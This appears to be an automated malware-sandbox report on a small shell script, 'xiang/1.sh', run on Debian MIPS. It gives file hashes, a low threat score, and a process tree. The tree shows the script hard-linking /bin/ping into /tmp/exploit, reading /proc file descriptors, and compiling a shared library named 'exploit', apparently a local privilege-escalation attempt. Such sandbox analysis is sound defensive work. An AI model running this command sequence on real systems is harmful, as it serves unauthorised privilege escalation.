Overview

overview

3

Static

static

1

xiang/1.sh

ubuntu-18.04-amd64

3

xiang/1.sh

debian-9-armhf

3

xiang/1.sh

debian-9-mips

3

xiang/1.sh

debian-9-mipsel

3

xiang/go.sh

windows7-x64

3

xiang/go.sh

windows10-2004-x64

3

xiang/ss

ubuntu-18.04-amd64

1

xiang/ssh-scan

ubuntu-18.04-amd64

1

Analysis

  • max time kernel
    18s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231215-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    21-12-2023 20:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xiang/1.sh

  • Size

    404B

  • MD5

    fa4f1798d03844cc950c5c0ff1ed71a7

  • SHA1

    7b7bb83c614603989d91a77ac0405d4000a0fa75

  • SHA256

    a5b0146024e8974f15f29c835f5d2d272a199846fa04963bb05d7e0bd14620ff

  • SHA512

    e94e75ade995e3ed08e1fcff6a830dbb28e512091d72af14bbf19ae6b6a33381130bda2c9b38050e61fc9dcf82e25ba06fb8d8f15edd4edeb1a7c1a675a8139e

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/xiang/1.sh
    /tmp/xiang/1.sh
    1⤵
    • Writes file to tmp directory
    PID:731
    • /bin/rm
      rm -r -f /tmp/exploit
      2⤵
        PID:739
      • /bin/mkdir
        mkdir /tmp/exploit
        2⤵
        • Reads runtime system information
        PID:740
      • /bin/ln
        ln /bin/ping /tmp/exploit/target
        2⤵
          PID:741
        • /bin/ls
          ls -l /proc/731/fd/3
          2⤵
          • Reads runtime system information
          PID:742
        • /bin/rm
          rm -rf /tmp/exploit
          2⤵
            PID:744
          • /bin/ls
            ls -l /proc/731/fd/3
            2⤵
            • Reads runtime system information
            PID:745
          • /bin/cat
            cat
            2⤵
              PID:746
            • /usr/bin/gcc
              gcc -w -fPIC -shared -o /tmp/exploit program.c
              2⤵
              • Writes file to tmp directory
              PID:747
              • /usr/lib/gcc/mips-linux-gnu/6/cc1
                /usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu program.c -meb -quiet -dumpbase program.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase program -w -fPIC -o /tmp/ccahe6Vs.s
                3⤵
                • Writes file to tmp directory
                PID:748
              • /usr/local/sbin/as
                as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                3⤵
                  PID:750
                • /usr/local/bin/as
                  as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                  3⤵
                    PID:750
                  • /usr/sbin/as
                    as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                    3⤵
                      PID:750
                    • /usr/bin/as
                      as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                      3⤵
                      • Writes file to tmp directory
                      PID:750
                    • /usr/lib/gcc/mips-linux-gnu/6/collect2
                      /usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccKTsKrn.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -shared -melf32btsmip -o /tmp/exploit /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/cc8n0s6G.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o
                      3⤵
                      • Writes file to tmp directory
                      PID:751
                      • /usr/bin/ld
                        /usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccKTsKrn.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -shared -melf32btsmip -o /tmp/exploit /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/cc8n0s6G.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o
                        4⤵
                        • Writes file to tmp directory
                        PID:752
                • /proc/self/fd/3
                  /proc/self/fd/3
                  1⤵
                    PID:731

                  Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/cc8n0s6G.o
                    Filesize

                    1KB

                    MD5

                    7f8ef4de0413dff95c590418f04883bb

                    SHA1

                    14bbc5abee67cbe68a8ed55fc4de6d22a254df7f

                    SHA256

                    c3bb1c7872a52bbeef03792aec5c1da996526f3d15b551fd43264b9d854dc95b

                    SHA512

                    8bf13fd1c3a71646018b1579dc25f2f8b47b9e8fa1ff503d31fb294e71081cf7ca46bcf7cd75487d1be355598cfbdc9fa6f815aee6966ee2ba199cc40f9d722a

                    Download Submit

                  • /tmp/ccahe6Vs.s
                    Filesize

                    1001B

                    MD5

                    59ba0606674e2404032fb5acbd9db79d

                    SHA1

                    909015a42f352e1f6707cb602a12fc175ff7692c

                    SHA256

                    ad06422ec376e599ccec9fb01ea611b71fdc9beb51a6af9b9ae71a6c6f499be1

                    SHA512

                    a273124dfd5ff551837200998b7c6d57f11409f8503eea651523b81daf72565f033127f6298b8a58c3d06e9813449293ee064a78eb569dd0fb6de0fc1e2726e8

                    Download Submit

                  • /tmp/exploit
                    Filesize

                    5KB

                    MD5

                    71b9ec6fd892da627f7c0c18793f12c8

                    SHA1

                    2be30d2c1f8a28d8c106d12e5061643748b1d407

                    SHA256

                    6d7dfe250efc110cbbbdd43a2ad65a53ed0a6d7532d82a9fdd54ab0422090efc

                    SHA512

                    72357351dc95618d8d2fc1a1ba0085aba04c5e2f871c11a4ae71350e65235d1eaf436d42b791e86fe547cc7b6ab02b4a8cb5f78894d39ea751b9e3bf83aa051c

                    Download Submit